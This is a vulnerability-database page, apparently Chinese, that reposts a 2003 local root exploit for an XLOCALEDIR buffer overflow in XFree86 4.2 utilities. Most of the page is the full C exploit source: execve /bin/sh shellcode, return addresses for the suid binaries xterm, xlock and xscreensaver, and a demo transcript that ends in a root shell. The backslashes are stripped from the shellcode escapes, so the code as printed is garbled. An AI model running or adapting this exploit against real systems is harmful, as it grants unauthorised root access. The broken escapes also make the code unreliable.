XFree86 4.2 – ‘XLOCALEDIR’ Local Buffer Overflow (1)
漏洞ID | 1053736 | 漏洞类型 | |
发布时间 | 2003-03-03 | 更新时间 | 2003-03-03 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.
/****
***
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC
***
** Tested against: Slackware 8.1
***
** This bug was found by tarranta and dcryptr 3 january 2003.
** Its a strcpy in the xf86 libraries that we exploit, using
** the bug to get the root privileges. If you put to much data
** in the XLOCALEDIR environment variable all programs using this
** library will cause a segmnetation fault. Some wierd reason makes
** the program not execute the first 8 bytes of the shellcode.
***
** Demonstration - here we use xlock as the target
** ----------------------------------------------
** martin@gDeU56:~$ ls -l /usr/X11R6/bin/xlock
** -rws--x--x 1 root bin 2193628 May 30 2002 /usr/X11R6/bin/xlock
** export XLOCALEDIR=`perl -e 'print "A" x 6000'`
** martin@gDeU56:~$ xlock
** Segmentation fault
** eip 0x41414141 0x41414141
**
** Exploitation:
** martin@gDeU56:~$ ./oC-XFree86-4.2.0 -t 2
** --- XFree86 Version 4.2.0 / X Window System - local root exploit ---
** [+] by: dcryptr && tarranta
** [+] oC-2003 - http://crionized.net/
** [+] attacking: /usr/X11R6/bin/xlock
** [+] using ret: 0xbfffe86d
** [+] spawning root shell!!!!
** sh-2.05a# id;uname -a
** uid=0(root) gid=0(root) groups=100(users)
** Linux gDeU56 2.4.18 #4 Fri May 31 01:25:31 PDT 2002 i686 unknown
***
** Remember that there is more than one suid file using this lib.
** /usr/X11R6/bin/xterm
** /usr/X11R6/bin/xscreensaver
***
** This may be vulnerable in other distros!!!
** We are currently making out new targets. look on our page
** for the newest version!
***
** (C) COPYRIGHT oC 2003
** All Rights Reserved
*******************************************************************************************************
** GREETS: dgram, lonely_, upstream, evilrip
***
****/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#define VERSION "0.9"
/* 57 bytes shellcode by dcryptr */
static char shellcode[] =
/* setuid(0); (ignored) */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x17" /* mov $0x17,%al */
"xcdx80" /* int $0x80 */
/* setuid(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x17" /* mov $0x17,%al */
"xcdx80" /* int $0x80 */
/* setgid(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x2e" /* mov $0x2e,%al */
"xcdx80" /* int $0x80 */
/* /bin/sh execve(); */
"x31xc0" /* xor %eax,%eax */
"x50" /* push %eax */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x31xd2" /* xor %edx,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
/* exit(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x01" /* mov $0x01,%al */
"xcdx80"; /* int $0x80 */
struct target {
int index;
char *distro;
char *dest;
char *name;
u_long retaddr;
int LEN;
};
/*
* There is like 200+ binaries that segfaults to this
* vuln but they are not suids. this is all the suids
* I found. Soundtracker is a music tracker that I am
* using and its vuln to.
*/
struct target exploit[] = {
{ 1, "Slackware 8.1 -", "/usr/X11R6/bin/xterm",
"xterm", 0xbfffe86d, 6000 },
{ 2, "Slackware 8.1 -", "/usr/X11R6/bin/xlock",
"xlock", 0xbfffe86d, 6000 },
{ 3, "Slackware 8.1 -", "/usr/X11R6/bin/xscreensaver",
"xscreensaver", 0xbfffe86e, 6000 },
{ 0, NULL, NULL, NULL, 0, 0 }
};
void usage(char *cmd);
int main(int argc, char **argv)
{
int i;
int type;
int size;
int options;
long retaddr;
char buffer[6000];
if(argc == 1) {
usage(argv[0]);
exit(0);
}
/* options of this exploit */
while((options = getopt(argc, argv, "ht:")) != EOF) {
switch(options) {
case 'h':
usage(argv[0]);
exit(0);
case 't':
type = atoi(optarg);
if (type > 3 || type < 0) {
printf("Out of range!!n");
exit(0);
}
if (type == 0) {
usage(argv[0]);
printf("num . descriptionn"
"----+----------------------------------------n");
for (i = 0; exploit[i].dest; i++)
fprintf(stderr, "[%d] | %s %sn", exploit[i].index, exploit[i].distro, exploit[i].dest);
exit(1);
}
break;
default:
usage(argv[0]);
exit(0);
}
}
size = exploit[type-1].LEN;
retaddr = exploit[type-1].retaddr;
fprintf(stderr, "n--- oC-localX "VERSION" - XFree86 Version 4.2.0 local root exploit ---n"
"[+] by: dcryptr && tarrantan"
"[+] oC-2003 - http://crionized.net/n"
"[+] attacking: %sn"
"[+] using ret: 0x%8lxn"
"[+] spawning shell!!!!n", exploit[type-1].dest, retaddr);
for (i = 0; i < size; i += 4)
*(long *)&buffer[i] = retaddr;
memcpy(buffer + 1, shellcode, strlen(shellcode));
setenv("XLOCALEDIR", buffer, 1); /* seting env variable */
if ( (execl(exploit[type-1].dest, exploit[type-1].name, NULL)) == -1) {
fprintf(stderr, "Try another target, you scriptkid!nn");
exit(-1);
}
return(0);
}
void usage(char *cmd)
{
fprintf(stderr, "n--- oC-localX "VERSION" - XFree86 Version 4.2.0 local root exploit ---n"
"by dcryptr && tarrantan"
"oC-2003 - http://crionized.net/nn"
"usage: %s [-h] [-t <num>]n"
"__optionsn"
" -ht- this helpn"
" -t numt- choose target (0 for list)nn", cmd);
}
Pyramid BenHur默认防火墙漏洞 漏洞ID 1203435 漏洞类型 配置错误 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2307 CNNVD-ID CNNVD-200212-230 漏洞平台 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666